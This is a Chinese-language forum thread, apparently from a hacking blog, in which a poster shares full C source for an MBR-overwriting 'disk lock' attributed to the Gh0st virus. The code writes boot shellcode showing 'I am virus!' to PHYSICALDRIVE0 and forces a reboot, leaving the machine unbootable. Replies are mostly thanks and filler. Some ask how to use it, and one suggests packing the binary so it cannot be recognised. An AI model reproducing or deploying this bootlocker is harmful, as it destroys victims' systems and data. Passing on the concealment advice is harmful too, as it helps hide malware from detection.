该帖已删除

小马博客

硬盘逻辑锁-Gh0st病毒核心

Tao0Lu

1.源码没有声明函数,修改MBR后没有重启进入锁机界面。
修改后

1. #include <windows.h>
   
2. #include <winioctl.h>
   
3. 
   
4. unsigned char scode[] =
   
5. "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
   
6. "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
   
7. "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
   
8. /*
   
9. 00000000  B81200 mov ax, 12H ; ah = 0, al = 12h (640 * 480)
   
10. 00000003  CD10 int 10h ; 进入图形显示方式，隐藏光标
    
11. 00000005  BD187C mov bp, Msg ; ES:BP = 串地址
    
12. 00000008  B91800 mov cx, 18h ; CX = 串长度
    
13. 0000000B  B80113 mov ax, 1301h ; AH = 13,  AL = 01h
    
14. 0000000E  BB0C00 mov bx, 000ch ; 页号为0(BH = 0) 黑底红字(BL = 0Ch,高亮)
    
15. 00000011  BA1D0E mov dx, 0e1dh ; dh行, dl列
    
16. 00000014  CD10 int 10h ; 10h 号中断
    
17. 00000016  E2FE loop $
    
18. Msg: db " I am virus! Fuck you ! :-("
    
19. */
    
20. int WINAPI WinMain(
    
21.         HINSTANCE hInstance,  // handle to current instance
    
22.         HINSTANCE hPrevInstance,  // handle to previous instance
    
23.         LPSTR lpCmdLine,      // pointer to command line
    
24.         int nCmdShow          // show state of window
    
25. )
    
26. {
    
27.         HANDLE hDevice;
    
28.         DWORD dwBytesWritten, dwBytesReturned;
    
29.         BYTE pMBR[512] = { 0 };
    
30. 
    
31.         // 重新构造MBR
    
32.         memcpy(pMBR, scode, sizeof(scode) - 1);
    
33.         pMBR[510] = 0x55;
    
34.         pMBR[511] = 0xAA;
    
35. 
    
36.         hDevice = CreateFile
    
37.         (
    
38.                 "\\\\.\\PHYSICALDRIVE0",
    
39.                 GENERIC_READ | GENERIC_WRITE,
    
40.                 FILE_SHARE_READ | FILE_SHARE_WRITE,
    
41.                 NULL,
    
42.                 OPEN_EXISTING,
    
43.                 0,
    
44.                 NULL
    
45.         );
    
46.         if (hDevice == INVALID_HANDLE_VALUE)
    
47.                 return -1;
    
48.         DeviceIoControl
    
49.         (
    
50.                 hDevice,
    
51.                 FSCTL_LOCK_VOLUME,
    
52.                 NULL,
    
53.                 0,
    
54.                 NULL,
    
55.                 0,
    
56.                 &dwBytesReturned,
    
57.                 NULL
    
58.         );
    
59.         // 写入病毒内容
    
60.         WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
    
61.         DeviceIoControl
    
62.         (
    
63.                 hDevice,
    
64.                 FSCTL_UNLOCK_VOLUME,
    
65.                 NULL,
    
66.                 0,
    
67.                 NULL,
    
68.                 0,
    
69.                 &dwBytesReturned,
    
70.                 NULL
    
71.         );
    
72.         CloseHandle(hDevice);
    
73.         system("shutdown -r -t 0");
    
74.         return 0;
    
75. }
    

复制代码

2.shellcode 限定488个字符(扇区512字节-24字节汇编)

gdxzll

看看666666666

誓不回头

学习学习

xtv2000922

感谢楼主共享

watermelon

膜拜膜拜

1024078948

学习解锁

牟宗程

1111111111

chenzihao

55555555555

2861831236

555555555555555555555555

wd2286034912

66666666666666666666666666666

rmz13564501732

这个怎么用

rmz13564501732

这个怎么用

2990771277

看看。。。。。感谢分享

半懵半懂

厉害厉害厉害

半懵半懂

顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶
顶

半懵半懂

这个加一下壳就更好了

半懵半懂

加壳了别人就看不出啥来了2333

16134761347

借鉴一下谢谢

eiphp

看看看看看